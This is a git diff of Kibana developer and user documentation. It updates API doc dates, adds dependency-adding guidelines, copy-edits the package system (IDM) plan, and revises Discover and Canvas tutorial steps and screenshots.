+++ b/api_docs/vis_type_heatmap.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeHeatmap title: "visTypeHeatmap" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeHeatmap plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeHeatmap'] --- import visTypeHeatmapObj from './vis_type_heatmap.devdocs.json'; diff --git a/api_docs/vis_type_pie.mdx b/api_docs/vis_type_pie.mdx index 42921f7913569..5da7c25387f85 100644 --- a/api_docs/vis_type_pie.mdx +++ b/api_docs/vis_type_pie.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypePie title: "visTypePie" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypePie plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypePie'] --- import visTypePieObj from './vis_type_pie.devdocs.json'; diff --git a/api_docs/vis_type_table.mdx b/api_docs/vis_type_table.mdx index 5c9e13373294d..02bb33a478f7b 100644 --- a/api_docs/vis_type_table.mdx +++ b/api_docs/vis_type_table.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeTable title: "visTypeTable" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeTable plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeTable'] --- import visTypeTableObj from './vis_type_table.devdocs.json'; diff --git a/api_docs/vis_type_timelion.mdx b/api_docs/vis_type_timelion.mdx index 0bb4f32b5070c..1d0ef14ec8dff 100644 --- a/api_docs/vis_type_timelion.mdx +++ b/api_docs/vis_type_timelion.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeTimelion title: "visTypeTimelion" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeTimelion plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeTimelion'] --- import visTypeTimelionObj from './vis_type_timelion.devdocs.json'; 
diff --git a/api_docs/vis_type_timeseries.mdx b/api_docs/vis_type_timeseries.mdx index 47f7ea437c03d..9b685fc5c1bbf 100644 --- a/api_docs/vis_type_timeseries.mdx +++ b/api_docs/vis_type_timeseries.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeTimeseries title: "visTypeTimeseries" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeTimeseries plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeTimeseries'] --- import visTypeTimeseriesObj from './vis_type_timeseries.devdocs.json'; diff --git a/api_docs/vis_type_vega.mdx b/api_docs/vis_type_vega.mdx index 094c06b226c73..af1ced42d7181 100644 --- a/api_docs/vis_type_vega.mdx +++ b/api_docs/vis_type_vega.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeVega title: "visTypeVega" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeVega plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeVega'] --- import visTypeVegaObj from './vis_type_vega.devdocs.json'; diff --git a/api_docs/vis_type_vislib.mdx b/api_docs/vis_type_vislib.mdx index b77b1cc71309a..3e2adba34760a 100644 --- a/api_docs/vis_type_vislib.mdx +++ b/api_docs/vis_type_vislib.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeVislib title: "visTypeVislib" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeVislib plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeVislib'] --- import visTypeVislibObj from './vis_type_vislib.devdocs.json'; diff --git a/api_docs/vis_type_xy.mdx b/api_docs/vis_type_xy.mdx index 03381a6cd1c6a..c1f5c4d6e90ac 100644 --- a/api_docs/vis_type_xy.mdx +++ b/api_docs/vis_type_xy.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visTypeXy title: "visTypeXy" image: https://source.unsplash.com/400x175/?github description: API docs for the visTypeXy plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visTypeXy'] --- import visTypeXyObj from './vis_type_xy.devdocs.json'; diff --git a/api_docs/visualizations.devdocs.json b/api_docs/visualizations.devdocs.json index 5931d92077178..5422e836c2845 100644 --- a/api_docs/visualizations.devdocs.json +++ b/api_docs/visualizations.devdocs.json @@ -3084,7 +3084,7 @@ "label": "getDisplayName", "description": [], "signature": [ - "(() => string) | undefined" + "() => string" ], "path": "src/plugins/visualizations/public/types.ts", "deprecated": false, @@ -5125,7 +5125,7 @@ "label": "VisualizeEmbeddableContract", "description": [], "signature": [ - "{ readonly type: \"visualization\"; readonly id: string; render: (domNode: HTMLElement) => Promise; getExplicitInput: () => ", + "{ readonly type: \"visualization\"; render: (domNode: HTMLElement) => Promise; readonly id: string; getExplicitInput: () => ", { "pluginId": "visualizations", "scope": "public", @@ -5505,7 +5505,7 @@ "section": "def-public.OnSaveProps", "text": "OnSaveProps" }, - ") => Promise; }" + ") => Promise; }" ], "path": "src/plugins/visualizations/public/index.ts", "deprecated": false, diff --git a/api_docs/visualizations.mdx b/api_docs/visualizations.mdx index 97311a13db262..ae8173bcceb6c 100644 --- a/api_docs/visualizations.mdx +++ b/api_docs/visualizations.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/visualizations title: "visualizations" image: https://source.unsplash.com/400x175/?github description: API docs for the visualizations plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'visualizations'] --- import visualizationsObj from './visualizations.devdocs.json'; 
diff --git a/dev_docs/api_welcome.mdx b/dev_docs/api_welcome.mdx index 1127ecc8603b6..43fac7407989d 100644 --- a/dev_docs/api_welcome.mdx +++ b/dev_docs/api_welcome.mdx @@ -12,7 +12,7 @@ documentation for every plugin that exposes a This documentation is being automatically generated using an - [_experimental_ system](https://github.com/elastic/kibana/blob/main/rfcs/text/0014_api_documentation.md). That means + [_experimental_ system](https://github.com/elastic/kibana/blob/main/legacy_rfcs/text/0014_api_documentation.md). That means it may be removed or modified at any time. If you have any questions, feedback or concerns, please create an issue using the label `APIDocs`, or reach out to the Kibana Tech Leads who are temporarily owning and maintaining this system. diff --git a/dev_docs/contributing/standards.mdx b/dev_docs/contributing/standards.mdx index 1bb54ada1509c..aba29e5fab2f2 100644 --- a/dev_docs/contributing/standards.mdx +++ b/dev_docs/contributing/standards.mdx 
@@ -15,6 +15,49 @@ We expect all developers to read and abide by our overarching . The majority of these items are linted against but some are not. +## Adding dependencies + +Looking for a dependency that isn't already available in Kibana? There are a few things to keep in mind before adding a new dependency. + +First, be sure you have read and are familiar with our . In particular, **Be wary of dependencies** +and **Prefer one way to do things** provide an overview of how we approach this question. + +In general, we have a bias toward **not** adding new dependencies unless there is a compelling reason to do so, as we want to +minimize Kibana's overall complexity. + +Should you find yourself evaluating a new dependency, here are some specific things to ask yourself: + +1. **Is there already another dependency that offers similar functionality?** If so, adding a new dependency may not be necessary. +Prefer one way to do things and use what's already there, unless there is an important reason not to do so. +2. **Does this dependency appear to be well-maintained?** A dependency that hasn't been updated in years is usually more of a +liability than an asset. Make sure the depedency has recent activity, that bugs and security vulnerabilities appear to be addressed +in a timely manner, and that there is active participation from the maintainers and community. +3. **How large is the dependency?** For client-side plugins, heavy dependencies can have a real impact on user experience, +especially if they are included in the initial page bundle and not loaded asynchronously. In some cases it might make more sense +to roll your own rather than include a bloated depedency, especially if you are only using a single piece of functionality. +4. **Does this dependency have a license that's compatible with Kibana's?** Most common open source licenses such as BSD, MIT, +and Apache 2.0/1.1 are okay to use with Kibana. Others may not be, or may require special attribution. +5. 
**Will this dependency need to be prebuilt?** Due to our build process, native module dependencies should include at least a prebuild +step so at install time it simply downloads instead of building from source. This allows us to optimize bootstrap times. +6. **Am I committed to maintaining this dependency?** Once you add a dependency to the `package.json`, someone else isn't going to +keep it updated for you. That means you will be responsible for updating it regularly, keeping an eye out for security vulnerabilities, +and dealing with any breaking changes that may arise during an upgrade. We recommend relying on the renovate bot to help keep the +dependency updated; be sure to mark your ownership of the package in the +[`renovate.json`](https://github.com/elastic/kibana/blob/main/renovate.json`) file. + +If you have any questions about whether adding a dependency is appropriate, feel free to reach out to one of the following teams +on Github: + +- **@elastic/kibana-tech-leads** +- **@elastic/kibana-core** +- **@elastic/kibana-operations** +- **@elastic/kibana-security** + + + If you are unsure of which licenses are okay to use, refer to the + [Permitted Open Source Licenses list](https://github.com/elastic/open-source/blob/main/elastic-product-policy.md#permitted-licenses-list). + + ## RESTful HTTP APIs ### Terminology diff --git a/dev_docs/key_concepts/embeddables.mdx b/dev_docs/key_concepts/embeddables.mdx index f1a2bea5b9b12..e42233a7f3f26 100644 --- a/dev_docs/key_concepts/embeddables.mdx +++ b/dev_docs/key_concepts/embeddables.mdx @@ -14,6 +14,7 @@ If you are planning to integrate with the plugin, please get in touch with the A ## Capabilities - Framework-agnostic API. - Out-of-the-box React support. +- Integration with Redux. - Integration with the [UI Actions](https://github.com/elastic/kibana/tree/HEAD/src/plugins/ui_actions) plugin. - Hierarchical structure to enclose multiple widgets. - Error handling. 
diff --git a/dev_docs/operations/operations_landing.mdx b/dev_docs/operations/operations_landing.mdx index 2b1a6e773d39f..49325b5babb57 100644 --- a/dev_docs/operations/operations_landing.mdx +++ b/dev_docs/operations/operations_landing.mdx @@ -73,5 +73,6 @@ layout: landing { pageId: "kibDevDocsOpsKibanaManifestSchema" }, { pageId: "kibDevDocsOpsManagedVscodeConfig" }, { pageId: "kibDevDocsOpsManagedVscodeConfigCli" }, + { pageId: "kibDevDocsOpsTest" }, ]} /> \ No newline at end of file diff --git a/dev_docs/operations/packages_idm.mdx b/dev_docs/operations/packages_idm.mdx index 62fe1a76c69f2..082af6605b092 100644 --- a/dev_docs/operations/packages_idm.mdx +++ b/dev_docs/operations/packages_idm.mdx 
@@ -11,13 +11,13 @@ tags: ['kibana', 'dev', 'contributor', 'operations', 'idm', 'packages'] The size of the Kibana repository has surpassed almost all other Typescript projects on Github, and the Javascript tooling ecosystem is inadequate. AppEx Operations team has done a lot of work over the years to close these gaps and keep up with our codebase's growth. Still, significant steps are necessary to provide a more efficient development experience. The AppEx Operations team is leading an effort to migrate to Bazel, which among other things, will provide remote caching and incremental builds. This initiative should drastically improve the productivity of Kibana contributors by minimizing what needs to be built, both locally and in CI, and providing faster and more thorough feedback. - This document represents the target of the IDM project and not the currently implemented features. See [What works now?][status] for information about current implementation status. + This document represents the target of the IDM project and not the currently implemented features. See [What works now?][status] for information about the current implementation status. ## Goals - Use packages as a core unit of code used throughout the repository -- Packages have well defined boundaries, a single responsibility, and are easily reusable and shareable across the repository when desired +- Packages have well-defined boundaries, a single responsibility, and are easily reusable and shareable across the repository when desired - Support organizing the repository by domain - Allow developers and CI to benefit from a remote cache and incremental builds for all development/validation/build tasks 
@@ -26,13 +26,13 @@ The size of the Kibana repository has surpassed almost all other Typescript proj These are some of the terms we are using to describe parts of this initiative: Build Tasks/Tasks -: We refer to any task/command that is executed as part of developement or CI as a "build task" or just "task" +: We refer to any task/command that is executed as part of development or CI as a "build task" or just "task". Package : Packages can be installed from NPM, or implemented in the repository. Local packages are structured in a specific way detailed in the [Package Structure](#package-structure) section. Incremental tasks -: The ability to execute the minimal set of build tasks necessary by inspecting the files which have changed and utilizing local+remote caches +: The ability to execute the minimal set of build tasks necessary by inspecting the files which have changed and utilizing local+remote caches. ## Package Structure 
@@ -41,52 +41,52 @@ Every package has: - a type, see [Package Types](#package-types) - dependencies on other packages in the repo or from NPM declared in their `kibana.jsonc` file and updated automatically - configuration files like `BUILD.bazel`, `jest.config.js`, `package.json`, etc. which are automatically generated when necessary from the `kibana.jsonc` file. - - a single interface. When you import a package you get it's one and only interface. Packages don't have sub-imports, or sub-modules. + - a single interface. When you import a package you get its one (and only) interface. Packages don't have sub-imports or sub-modules. - the ability to include jest tests alongside the code ## Package Types - -Every package is of one of the following types. Using package types allows us to have many different packages and pre-defined build tasks, restrictions, and unique config for each package type. There is currently a proposal to add a new `test-helpers` package type, and we expect more package types to be defined in the future. +Package types allow us to have many different packages, pre-defined build tasks, restrictions, and unique configurations for each package type. Every package is one of the following types: `shared-common` : These packages can be imported from all other packages. `shared-browser` -: These packages can be imported from `shared-browser` and `plugin-browser` packages. Storybooks may be included in package of type `shared-browser`. +: These packages can be imported from `shared-browser` and `plugin-browser` packages. `shared-browser` packages may include Storybooks. `shared-server` : These packages can be imported from `shared-server` and `plugin-server` packages. `shared-scss` -: These packages can be imported by `shared-browser` and `plugin-browser` packages. Instead of an `index.ts` file these pacakges have an `index.scss` file which will be exposed to consumers of this package. 
+: These packages can be imported by `shared-browser` and `plugin-browser` packages, and expose an `index.scss` file to consumers instead of an `index.ts` file. `plugin-browser` -: These packages expose types to other packages via a root `types.ts` file, `import type` statements must be used when importing. Module IDs must end with `-plugin-browser`. +: These packages expose types to other packages via a root `types.ts` file. Module IDs must end with `-plugin-browser`. Consumers must use `import type` statements. `plugin-server` -: These packages expose types to other packages via a root `types.ts` file, `import type` statements must be used when importing. Module IDs must end with `-plugin-server`. +: These packages expose types to other packages via a root `types.ts` file. Module IDs must end with `-plugin-server`. Consumers must use `import type` statements. `functional-test` -: These packages can not be imported by other packages and expose one or more functional testing configurations, including API integration tests. Having this separate means that iterating on functional tests will not need to rebuild the application and updating the application will usually not rebuild the tests. - +: These packages expose one or more functional testing configurations, including API integration tests, and can not be imported by other packages. Separating functional and integration tests allows us to iterate on tests without rebuilding the application. Similarly, iterating and updating the application should mostly mean the tests don't need to rebuild. +There is currently a proposal to add a new `test-helpers` package type, and we expect more package types to be defined in the future if and when the need arises. + ## Phases -We're planning to implement the full package system described in phases. Currently, those phases look like this: +We're planning to implement the full package system in phases. 
Currently, those phases look like this: ### Phase 1: Ground preparation **status:** ✅ complete -This phase is about identifying issues that would prevent a migration for teams in order to provide adequate time for them before they have the need to migrate. +This phase is about identifying issues that would prevent a migration for teams to provide adequate time for them before they need to migrate. - Migrate all plugins to use module IDs - - Find instances of ESLint being disabled and illegal cross-boundary imports are used; create issues for teams to address + - Find instances where ESLint is disabled and illegal cross-boundary imports are used; create issues for teams to address - Prevent naked eslint-disable - Prevent disabling specific ESLint rules - Windows development is not supported - - Rewrite @kbn/pm using native Node.js to remove its build step. Anything outside of bootstrap like clean and reset commands will move to different packages. - - Document how to break up packages into smaller pieces + - Rewrite `@kbn/pm` using native Node.js to remove its build step. Anything outside of bootstrap, like clean and reset commands, will move to different packages. + - Document how to break up packages into smaller units of code ### Phase 2: Legacy packages migration @@ -94,9 +94,9 @@ This phase is about identifying issues that would prevent a migration for teams This phase is about migrating the existing legacy packages to one of the [package types](#package-types). - - Add kibana.json files to existing packages - - Auto generating configuration files based on the `kibana.jsonc` manifest - - Discover dependencies used in packages automatically + - Add `kibana.json` files to existing packages + - Auto-generate configuration files based on `kibana.jsonc` manifests + - Automate package dependency discovery ### Phase 3: Double down on DX 
@@ -116,13 +116,13 @@ This phase is all about supporting the creation of plugin-browser and plugin-ser
- Extracting Webpack config from @kbn/optimizer to work on a single bundle inside Bazel
- Update plugin discovery to find and differentiate between legacy plugins and plugin-browser/server packages
- ESLint rules to validate imports into and out of plugin-browser and plugin-server packages
- - Finish the migration of core to packages and reflect with the core team (and possibly the Shared UX team) around what we should recommend for plugin authors before we start to migrate legacy plugins to the package system
+ - Finish the migration of core to packages and reflect with the core team (and possibly the Shared UX team) on what we should recommend for plugin authors before we start to migrate legacy plugins to the package system
- Documentation, documentation, documentation
- How do 3rd party plugins migrate to the new system?
### Phase 5: Legacy plugins migration
-This phase is all about having the solution teams migrating their legacy plugins into packages.
+This phase is all about having the solution teams migrate their legacy plugins into packages.
- Identify the order of plugins that can be migrated
- Identify and communicate what needs to be done by teams
@@ -137,40 +137,40 @@ This phase is about finalizing the rough edges and making sure every piece of co
- Extend the package development tooling to support 3rd party package development and allow packages to participate in the benefits of Bazel within the `plugins` directory.
- Ability for 3rd party packages to require specific versions of specific packages from NPM
- Automatically build the components that need changes
- - Build package artifacts that can be installed in Kibana distributables
+ - Build package artifacts that can be installed in a Kibana distributable
## FAQ
### Is it time for me to start creating packages?
-Probably not. The Shared UX and Core teams are currently our Guinea Pig teams and they're experiencing the pain of living on the bleeding edge. If you want to create a single package you are welcome to, but for now it's probably best that you wait until Operations reached out to your team.
+Probably not. The Shared UX and Core teams are currently our "Guinea Pig" teams and they're experiencing the pain of living on the bleeding edge. If you want to create a single package you are welcome to, but for now, it's probably best that you wait until Operations reached out to your team.
### How do circular dependencies work?
-By breaking the repository into packages we not be able to support cross-package circular dependency.
+By breaking the repository into packages we can't support cross-package circular dependencies.
-Imagine trying to build the types for `@kbn/a`, which depend on the types for `@kbn/b`. If `@kbn/b` also depends on the types for `@kbn/a` there is no way to build the types for eather package because they form a circular dependency.
+For example, imagine trying to build the types for `@kbn/a` that depend on the types for `@kbn/b`. If `@kbn/b` also depends on the types for `@kbn/a` there's a circular dependency meaning there isn't a way to build the types for either.
-If you cause a circular dependency in the task graph Bazel will produce a pretty great error message explaining where the cycle is.
+If you cause a circular dependency in the task graph, Bazel will produce a pretty great error message explaining where the cycle is.
-So far, the solution to resolving circular dependencies has always been to break out some component which is causing the circular dependency into a separate package. Packages are light weight, and are very easy to create ([work in progress][status]) so please feel comfortable creating more packages.
+The solution to resolving a circular dependency has, thus far, been to break out the component causing it, into a separate package. Packages are lightweight and are very easy to create ([work in progress][status]) so please feel comfortable creating more packages as you need to.
### How do we name packages?
There are a few package naming rules:
- all packages must use the `@kbn/` namespace
- - `plugin-browser` packages must end with `-plugin-browser`
- - `plugin-server` packages must end with `-plugin-server`
- - be considerate of the fact that we are operating in a global namespace and avoid overly generic names
+ - `plugin-browser`-type packages must end with `-plugin-browser`
+ - `plugin-server- type packages must end with `-plugin-server`
+ - considering that we operate in a global namespace, avoid overly generic names
-Other than these rules, it's up to you what the best name for your package is.
+Other than these rules, it's up to you and your team to decide on an appropriate name for your package.
- Keep the single responsibility principle in mind, if there isn't a clear name for your package it might mean that it includes too many things and should be split into multiple smaller packages with explicit purposes.
+ Keep the single responsibility principle in mind. A good indication that a package contains too much is that naming it isn’t easy.
In such cases, consider splitting it into multiple, smaller packages with their specific purpose.
-The shared-ux team makes a lot of packages containing a single component which is widely shared and provides a lot of helpers and types for other packages to consume, the shared-ux team has used the following naming scheme:
+The shared-ux team makes a lot of packages, each containing a single, widely shared component along with helpers and types, for other packages to consume. The shared-ux team has used the following naming scheme:
```
/{domain}/{componentName}
@@ -191,15 +191,15 @@ The `@kbn/{team}-{domain}-{component}(-{type})?` style naming scheme is also fol
### Where do I put my package?
-The only rule the package system enforces is that packages can't live inside of other packages. Additionally, for licensing purposes it's probably best to keep SSPL licensed code in the `packages` or `src` directories and Elastic licensed code in the `x-pack` directory.
+The only rule the package system enforces is that packages can't live inside of other packages. Additionally, for licensing purposes, it's probably best to keep SSPL licensed code in the `packages` or `src` directories and Elastic licensed code in the `x-pack` directory.
-Otherise, you can put your packages wherever you like. It's probably best that you don't put them in the current `packages` directory as it's huge and only getting bigger with time.
+Otherwise, you can put your packages wherever you like. It's probably best that you don't put them in the current `packages` directory as it's huge and only getting bigger with time.
To define a new directory where packages will live you will need to edit the [`BAZEL_PACKAGE_DIRS`][pkgDirs] const. This list points to all the directories where packages can live in the repository and includes the current list of locations where packages are being created.
### What works now?
-Today we have a basic package generator that produces legacy package definitions. We're done laying the groundwork now and have both the Core and Shared UX teams playing guinea pig. You can use the legacy package generator with `node scripts/generate package` and create a package, but it's not the right time for more teams to start migrating large portions of their code to packages.
+Today we have a simplistic package generator that produces legacy package definitions. We've finished laying the groundwork and have both the Core and Shared UX teams experimenting with it.
You can use the legacy package generator with `node scripts/generate package` and create a package, however, we don’t recommend other teams to start migrating large portions of their code to packages just yet.
We're now entering Phase 2 of the plan, more details about the phases of our plan can be found [above](#phases)
diff --git a/docs/canvas/canvas-tutorial.asciidoc b/docs/canvas/canvas-tutorial.asciidoc
index 389cac89cde82..73d808a183920 100644
--- a/docs/canvas/canvas-tutorial.asciidoc
+++ b/docs/canvas/canvas-tutorial.asciidoc
@@ -9,9 +9,11 @@ To familiarize yourself with *Canvas*, add the Sample eCommerce orders data, the
To create a workpad of the eCommerce store data, add the data set, then create the workpad.
-. Go to the {kib} *Home* page, then click *Try our sample data*.
+. On the home page, click *Try sample data*.
-. On the *Sample eCommerce orders data* card, click *Add data*.
+. Click *Other sample data sets*.
+
+. On the *Sample eCommerce orders* card, click *Add data*.
. Open the main menu, then click *Canvas*.
diff --git a/docs/concepts/data-views.asciidoc b/docs/concepts/data-views.asciidoc
index 9e2015fc730a4..8726b3a55cbd0 100644
--- a/docs/concepts/data-views.asciidoc
+++ b/docs/concepts/data-views.asciidoc
@@ -65,7 +65,7 @@ based on different timestamps.
. To specify your own {data-source} name, click *Show advanced settings*, then enter the name in the *Custom {data-source} ID* field. For example, enter your {es} index alias name.
-. Click *Create {data-source}*.
+. Click *Save {data-source} to {kib}*.
+
[[reload-fields]]
{kib} is now configured to use your {es} data. When a new field is added to an index, the {data-source} field list is updated
@@ -149,4 +149,4 @@ WARNING: Deleting a {data-source} breaks all visualizations, saved searches, and
. Open the main menu, then click *Stack Management > Data Views*.
. Find the {data-source} that you want to delete, and then
-click (image:management/index-patterns/images/delete.png[Delete icon]) in the *Actions* column.
+click image:management/index-patterns/images/delete.png[Delete icon] in the *Actions* column.
diff --git a/docs/developer/getting-started/monorepo-packages.asciidoc b/docs/developer/getting-started/monorepo-packages.asciidoc
index b6524c6007b2e..a9dc912ab58e4 100644
--- a/docs/developer/getting-started/monorepo-packages.asciidoc
+++ b/docs/developer/getting-started/monorepo-packages.asciidoc
@@ -41,8 +41,6 @@ yarn kbn watch
[discrete]
=== List of Already Migrated Packages to Bazel
-- @elastic/eslint-config-kibana
-- @elastic/safer-lodash-set
- @kbn/ace
- @kbn/analytics
- @kbn/apm-config-loader
@@ -57,6 +55,7 @@ yarn kbn watch
- @kbn/docs-utils
- @kbn/es
- @kbn/es-archiver
+- @kbn/eslint-config-kibana
- @kbn/eslint-plugin-eslint
- @kbn/expect
- @kbn/i18n
@@ -68,6 +67,7 @@ yarn kbn watch
- @kbn/optimizer
- @kbn/plugin-helpers
- @kbn/rule-data-utils
+- @kbn/safer-lodash-set
- @kbn/securitysolution-autocomplete
- @kbn/securitysolution-es-utils
- @kbn/securitysolution-hook-utils
diff --git a/docs/developer/plugin-list.asciidoc b/docs/developer/plugin-list.asciidoc
index 64077b2ecc106..00f0bc517f5a5 100644
--- a/docs/developer/plugin-list.asciidoc
+++ b/docs/developer/plugin-list.asciidoc
@@ -259,10 +259,6 @@ oss plugins.
generating deep links to other apps using locators, and creating short URLs.
-|{kib-repo}blob/{branch}/src/plugins/shared_ux/README.md[sharedUX]
-|Our mission is to make consistency in our user experience a product.
-
-
|{kib-repo}blob/{branch}/src/plugins/telemetry/README.md[telemetry]
|Telemetry allows Kibana features to have usage tracked in the wild. The general term "telemetry" refers to multiple things:
diff --git a/docs/discover/document-explorer.asciidoc b/docs/discover/document-explorer.asciidoc
index 665d668a41ee7..32811cfbe7728 100644
--- a/docs/discover/document-explorer.asciidoc
+++ b/docs/discover/document-explorer.asciidoc
@@ -27,13 +27,13 @@ data-type="inline"
Use drag and drop to organize the columns and improve the view of the data.
-To reorder columns, do one of the following:
+* To move a single column, click its header. In the dropdown menu,
+click *Move left* or *Move right*.
-* Click *Columns*. In the pop-up, select the column you want to move and drag it to the new location.
+* To move multiple columns, click *Columns*.
+In the pop-up, drag the column names to their new order.
-* Click the header of the column you want to move. In the dropdown menu, click *Move left* or *Move right*.
-
-To resize a column, drag the right edge of the column header until the column is the width that you want.
+* To resize a column, drag the right edge of the column header until the column is the width that you want.
Column widths are stored with a saved search. When you visualize saved searches on dashboards, the saved search appears the same as in **Discover**.
@@ -104,7 +104,7 @@ You can view the document in two ways. The **Table** view displays the document
The **JSON** (JavaScript Object Notation) view allows you to look at how {es} returns the document.
+
[role="screenshot"]
-image::images/document-explorer-expand.png[Expanded view of the document table]
+image::images/document-table-expanded.png[Expanded view of the document table]
+
. In the *Table* view, scan through the fields and their values, or search for a field by name.
@@ -152,4 +152,4 @@ By default, the document table displays 100 rows per page. To change this number
click *Rows per page*.
[role="screenshot"]
-image::images/document-table-rows-per-page.png["Menu with options for setting the number of rows in the document table", width=50%]
+image::images/document-table-rows-per-page.png["Menu with options for setting the number of rows in the document table"]
diff --git a/docs/discover/field-statistics.asciidoc b/docs/discover/field-statistics.asciidoc
index 52f78f3376cda..6c5b5a6767a50 100644
--- a/docs/discover/field-statistics.asciidoc
+++ b/docs/discover/field-statistics.asciidoc
@@ -16,7 +16,7 @@ the <>, or you can use your own d
. Open the main menu, and click *Discover*.
-. Expand the {data-source} dropdown, and select *kibana_sample_data_logs*.
+. Expand the {data-source} dropdown, and select *Kibana Sample Data Logs*.
. If you don’t see any results, expand the time range, for example, to *Last 7 days*.
diff --git a/docs/discover/images/customer.png b/docs/discover/images/customer.png
index 2ab177eba28bf..c60c98b25e54d 100644
Binary files a/docs/discover/images/customer.png and b/docs/discover/images/customer.png differ
diff --git a/docs/discover/images/discover-context.png b/docs/discover/images/discover-context.png
index b625a18b35aa2..35954fa7a2b51 100644
Binary files a/docs/discover/images/discover-context.png and b/docs/discover/images/discover-context.png differ
diff --git a/docs/discover/images/discover-data-view.png b/docs/discover/images/discover-data-view.png
index c73af3db24140..50b1866ab7a68 100644
Binary files a/docs/discover/images/discover-data-view.png and b/docs/discover/images/discover-data-view.png differ
diff --git a/docs/discover/images/discover-from-visualize.png b/docs/discover/images/discover-from-visualize.png
index 74307bcd46a2c..2a3ba610299b6 100644
Binary files a/docs/discover/images/discover-from-visualize.png and b/docs/discover/images/discover-from-visualize.png differ
diff --git a/docs/discover/images/discover-search-for-relevance.png b/docs/discover/images/discover-search-for-relevance.png
index d9d5834c9e382..e710cab0ddf2f 100644
Binary files a/docs/discover/images/discover-search-for-relevance.png and b/docs/discover/images/discover-search-for-relevance.png differ
diff --git a/docs/discover/images/discover-sidebar-available-fields.png b/docs/discover/images/discover-sidebar-available-fields.png
index e330036524ae7..363f3f7141086 100644
Binary files a/docs/discover/images/discover-sidebar-available-fields.png and b/docs/discover/images/discover-sidebar-available-fields.png differ
diff --git a/docs/discover/images/discover.png b/docs/discover/images/discover.png
index 818b9ed5d2599..1a2d839717f76 100644
Binary files a/docs/discover/images/discover.png and b/docs/discover/images/discover.png differ
diff --git a/docs/discover/images/document-table-expanded.png b/docs/discover/images/document-table-expanded.png
index 0248c31f894e0..06b244268c1d7 100644
Binary files a/docs/discover/images/document-table-expanded.png and b/docs/discover/images/document-table-expanded.png differ
diff --git a/docs/discover/images/document-table-rows-per-page.png b/docs/discover/images/document-table-rows-per-page.png
index 21643903e4021..54ab8c359239a 100644
Binary files a/docs/discover/images/document-table-rows-per-page.png and b/docs/discover/images/document-table-rows-per-page.png differ
diff --git a/docs/discover/images/document-table.png b/docs/discover/images/document-table.png
index 388f3c4344a09..6cb47390fd584 100644
Binary files a/docs/discover/images/document-table.png and b/docs/discover/images/document-table.png differ
diff --git a/docs/discover/images/hello-field.png b/docs/discover/images/hello-field.png
index 8dd38a9f94209..40527e90fbb64 100644
Binary files a/docs/discover/images/hello-field.png and b/docs/discover/images/hello-field.png differ
diff --git a/docs/discover/search-for-relevance.asciidoc b/docs/discover/search-for-relevance.asciidoc
index df581634877f1..c6f092edd0015 100644
--- a/docs/discover/search-for-relevance.asciidoc
+++ b/docs/discover/search-for-relevance.asciidoc
@@ -10,7 +10,7 @@ the <>, or you can use your ow
. In *Discover*, open the {data-source} dropdown, and select the data that you want to work with.
+
-For the sample flights data, set the {data-source} to *kibana_sample_data_flights*.
+For the sample flights data, set the {data-source} to *Kibana Sample Data Flights*.
. Run your search. For the sample data, try:
+
@@ -32,4 +32,4 @@ image::images/field-sorting-popover.png["Field sorting popover", width=60%]
Your table now sorts documents from most to least relevant.
+
[role="screenshot"]
-image::images/discover-search-for-relevance.png["Documents are sorted from most relevant to least relevant.", width=75%]
+image::images/discover-search-for-relevance.png["Documents are sorted from most relevant to least relevant."]
diff --git a/docs/getting-started/images/addData_sampleDataCards_7.15.0.png b/docs/getting-started/images/addData_sampleDataCards_7.15.0.png
deleted file mode 100644
index 27e10b98b9670..0000000000000
Binary files a/docs/getting-started/images/addData_sampleDataCards_7.15.0.png and /dev/null differ
diff --git a/docs/getting-started/images/addData_sampleDataCards_8.4.0.png b/docs/getting-started/images/addData_sampleDataCards_8.4.0.png
new file mode 100644
index 0000000000000..49a83dbbdc10b
Binary files /dev/null and b/docs/getting-started/images/addData_sampleDataCards_8.4.0.png differ
diff --git a/docs/getting-started/images/addFilterOptions_dashboard_8.4.0.png b/docs/getting-started/images/addFilterOptions_dashboard_8.4.0.png
new file mode 100644
index 0000000000000..eb16edb2b0764
Binary files /dev/null and b/docs/getting-started/images/addFilterOptions_dashboard_8.4.0.png differ
diff --git a/docs/getting-started/images/addFilter_dashboard_8.4.0.png b/docs/getting-started/images/addFilter_dashboard_8.4.0.png
new file mode 100644
index 0000000000000..eeec26daad89d
Binary files /dev/null and b/docs/getting-started/images/addFilter_dashboard_8.4.0.png differ
diff --git a/docs/getting-started/images/availableFields_discover_8.4.0.png b/docs/getting-started/images/availableFields_discover_8.4.0.png
new file mode 100644
index 0000000000000..ba3b9ecaeb4ac
Binary files /dev/null and b/docs/getting-started/images/availableFields_discover_8.4.0.png differ
